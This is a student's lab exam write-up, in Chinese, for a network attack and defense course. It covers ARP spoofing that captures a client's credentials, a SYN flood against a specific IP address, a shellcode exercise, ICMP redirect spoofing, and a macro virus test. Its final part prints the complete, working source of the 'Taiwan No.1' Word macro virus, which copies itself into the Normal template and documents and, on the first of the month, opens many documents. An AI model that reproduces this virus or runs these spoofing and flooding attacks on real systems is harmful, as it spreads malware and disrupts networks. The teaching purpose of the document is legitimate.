《网络攻击与防御》课程机考试题
机考要求:
1.考试时间内完成所有实验考核内容;
2.需完整实验并记录下实验过程;
3.考试时间120分钟;
4.满分100分,每题20分。
一、利用Netwag或类似工具进行ARP欺骗攻击,并利用Wireshark捕获相关网络数据。
这里使用的是kali工具:ettercap,三台机器,一台服务器,一台客户端,一台攻击机,kali当作攻击机,windowsxp当作客户端,windows2003当作服务端。
首先搭好服务器:
然后客户端访问:
打开kali的工具ettercap,查找主机,找到两个:
配置好之后,在客户端输入123,密码123,kali进行查看到账户密码,欺骗成功:
二、利用Netwag或类似工具进行DDOS攻击,并利用Wireshark捕获相关网络数据。
这里用的是SYN Floor攻击,SYN Flood是当前最流行的DoS与DDoS的攻击方式之一。
netwag选择76号,输入SYN flood攻击的目标ip和端口,这里使用的IP:122.13.75.80:
运行之后输入过滤规则,方便查看:ip.src122.13.75.80 or ip.dst122.13.75.80,结果如下:
三、请编写一段Shellcode,并将实验过程及结果详细记录下来。
运行一个代码:
下断点,然后查看汇编代码:
记录下地址,然后查看内存:
这是真实地址:
编写汇编程序,运行得到:
下断点,调式:
查看汇编代码:
查看内存,复制如下数值:
然后这个数值就是shellcode,编写如下代码:
运行之后也能弹出窗口:
四、利用Netwag或类似工具进行ICMP重定向攻击,并利用Wireshark捕获相关网络数据。
打开Netwag软件找到86:
在newgateway填写自己的ip地址,使自己ip伪造成路由器:
攻击结果如下:
五、利用“台湾一号”宏病毒进行实验性攻击,并将实验过程及结果详细记录下来。
打开word2003,修改设置,工具->宏->安全性->安全性选择最低
点击确定!然后alt+F11进入编辑界面,在对应的地方输入宏代码,然后保存:
修改时间日期为1号,然后双击打开文档,出现如下界面:
输入正确的答案得到,错误则会显示很多的word文档,结束进程即可关闭:
台湾一号宏代码:
'moonlight
Dim nm(4)
Sub Document_Open()
'DisableInput 1
Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule
Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With host
If .Lines(1, 1) <> "'moonlight" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 3, "Sub Document_Close()"
If ThisDocument = NormalTemplate Then
.ReplaceLine 3, "Sub Document_Open()"
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End If
End With
Count = 0
If Day(Now()) = 1 Then
try:
On Error GoTo try
test = -1
con = 1
tog$ = ""
i = 0
While test = -1
For i = 0 To 4
nm(i) = Int(Rnd() * 10)
con = con * nm(i)
If i = 4 Then
tog$ = tog$ + Str$(nm(4)) + "=?"
GoTo beg
End If
tog$ = tog$ + Str$(nm(i)) + "*"
Next i
beg:
Beep
ans$ = InputBox$("今天是" + Date$ + ",跟你玩一个心算游戏" + Chr$(13) + "若你答错,只好接受震撼教育......" + Chr$(13) + tog$, "台湾NO.1 Macro Virus")
If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then
Documents.Add
Selection.Paragraphs.Alignment = wdAlignParagraphCenter
Beep
With Selection.Font
.Name = "细明体"
.Size = 16
.Bold = 1
.Underline = 1
End With
Selection.InsertAfter Text:="何谓宏病毒"
Selection.InsertParagraphAfter
Beep
Selection.InsertAfter Text:="答案:"
Selection.Font.Italic = 1
Selection.InsertAfter Text:="我就是......"
Selection.InsertParagraphAfter
Selection.InsertParagraphAfter
Selection.Font.Italic = 0
Beep
Selection.InsertAfter Text:="如何预防宏病毒"
Selection.InsertParagraphAfter
Beep
Selection.InsertAfter Text:="答案:"
Selection.Font.Italic = 1
Selection.InsertAfter Text:="不要看我......"
GoTo out
Else
Count = Count + 1
For j = 1 To 20
Beep
Documents.Add
Next j
Selection.Paragraphs.Alignment = wdAlignParagraphCenter
Selection.InsertAfter Text:="宏病毒"
If Count = 2 Then GoTo out
GoTo try
End If
Wend
End If
out:
End Sub